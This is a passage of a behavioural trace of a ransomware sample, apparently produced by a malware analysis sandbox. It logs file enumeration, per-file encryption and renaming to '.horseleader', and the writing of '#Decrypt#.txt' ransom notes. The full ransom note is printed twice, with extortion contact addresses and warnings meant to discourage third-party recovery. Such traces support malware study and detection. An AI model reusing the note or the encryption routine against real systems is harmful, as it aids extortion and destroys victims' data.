StrStrIW (lpFirst="msdbg2.dll", lpSrch=".horseleader") returned 0x0 [0252.044] lstrcmpW (lpString1="msdbg2.dll", lpString2="#Decrypt#.txt") returned 1 [0252.044] lstrcmpW (lpString1="msdbg2.dll", lpString2="_uninstalling_.png") returned 1 [0252.044] lstrlenW (lpString=".testttjffg") returned 11 [0252.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll", lpSrch=".testttjffg") returned 0x0 [0252.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll" (normalized: "c:\\program files\\internet explorer\\msdbg2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.044] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x594eb7ab, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0x594eb7ab, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0x439e9300, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x83200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="pdm.dll", cAlternateFileName="")) returned 1 [0252.044] lstrcmpiW (lpString1="pdm.dll", lpString2="Windows") returned -1 [0252.044] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll") returned 46 [0252.044] StrStrIW (lpFirst="pdm.dll", lpSrch=".horseleader") returned 0x0 [0252.044] lstrcmpW (lpString1="pdm.dll", lpString2="#Decrypt#.txt") returned 1 [0252.044] lstrcmpW (lpString1="pdm.dll", lpString2="_uninstalling_.png") returned 1 [0252.044] lstrlenW (lpString=".testttjffg") returned 11 [0252.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll", lpSrch=".testttjffg") returned 0x0 [0252.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.045] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\pdm.dll" (normalized: "c:\\program files\\internet explorer\\pdm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.045] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0252.045] lstrcmpiW (lpString1="SIGNUP", lpString2="Windows") returned -1 [0252.045] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP") returned 45 [0252.045] lstrcmpW (lpString1="SIGNUP", lpString2=".") returned 1 [0252.045] lstrcmpW (lpString1="SIGNUP", lpString2="..") returned 1 [0252.045] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.045] GetProcessHeap () returned 0x780000 [0252.045] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0252.045] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*") returned 47 [0252.045] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0252.045] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.045] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\.") returned 47 [0252.045] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.046] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x98d1a336, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98d1a336, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0252.046] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.046] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\..") returned 48 [0252.046] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0252.046] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0252.046] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="install.ins", cAlternateFileName="")) returned 1 [0252.046] lstrcmpiW (lpString1="install.ins", lpString2="Windows") returned -1 [0252.046] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0252.046] StrStrIW (lpFirst="install.ins", lpSrch=".horseleader") returned 0x0 [0252.046] lstrcmpW (lpString1="install.ins", lpString2="#Decrypt#.txt") returned 1 [0252.046] lstrcmpW (lpString1="install.ins", lpString2="_uninstalling_.png") returned 1 [0252.046] lstrlenW (lpString=".testttjffg") returned 11 [0252.046] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", lpSrch=".testttjffg") returned 0x0 [0252.046] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0252.046] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0252.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0252.047] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins") returned 57 [0252.047] StrStrW (lpFirst="install.ins", lpSrch=".txt") returned 0x0 [0252.047] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=460) returned 1 [0252.047] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1cc, lpOverlapped=0x0) returned 1 [0252.049] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1cc, lpOverlapped=0x0) returned 1 [0252.049] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0252.049] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0252.049] CloseHandle (hObject=0x21c) returned 1 [0252.049] GetProcessHeap () returned 0x780000 [0252.050] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0252.050] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.horseleader") returned 69 [0252.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.horseleader" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.horseleader")) returned 1 [0252.050] GetProcessHeap () returned 0x780000 [0252.050] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0252.051] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80471418, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xf22307c6, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xf22307c6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="install.ins", cAlternateFileName="")) returned 0 [0252.051] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0252.051] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\#Decrypt#.txt") returned 59 [0252.051] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\SIGNUP\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\signup\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0252.051] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.051] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0252.053] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.053] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.053] CloseHandle (hObject=0x1cc) returned 1 [0252.053] GetProcessHeap () returned 0x780000 [0252.053] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.053] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0252.053] lstrcmpiW (lpString1="sqmapi.dll", lpString2="Windows") returned -1 [0252.053] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll") returned 49 [0252.054] StrStrIW (lpFirst="sqmapi.dll", lpSrch=".horseleader") returned 0x0 [0252.054] lstrcmpW (lpString1="sqmapi.dll", lpString2="#Decrypt#.txt") returned 1 [0252.054] lstrcmpW (lpString1="sqmapi.dll", lpString2="_uninstalling_.png") returned 1 [0252.054] lstrlenW (lpString=".testttjffg") returned 11 [0252.054] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll", lpSrch=".testttjffg") returned 0x0 [0252.054] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.054] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.054] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x855fc7e1, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x855fc7e1, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x85622942, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3bc00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="sqmapi.dll", cAlternateFileName="")) returned 0 [0252.054] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0252.054] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\#Decrypt#.txt") returned 52 [0252.054] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\#Decrypt#.txt" (normalized: "c:\\program files\\internet explorer\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0252.055] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0252.055] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0252.056] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0252.056] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0252.056] CloseHandle (hObject=0x164) returned 1 [0252.056] GetProcessHeap () returned 0x780000 [0252.057] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0252.057] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0252.057] lstrcmpiW (lpString1="Microsoft Analysis Services", lpString2="Windows") returned -1 [0252.057] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services") returned 48 [0252.057] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0252.057] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0252.057] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Microsoft Analysis Services", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0252.057] GetProcessHeap () returned 0x780000 [0252.057] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0252.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*") returned 50 [0252.057] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\*", lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0252.057] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0252.057] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\.") returned 50 [0252.057] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0252.057] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe376d540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe376d540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="..", cAlternateFileName="")) returned 1 [0252.058] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0252.058] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\..") returned 51 [0252.058] lstrcmpW (lpString1="..", lpString2=".") returned 1 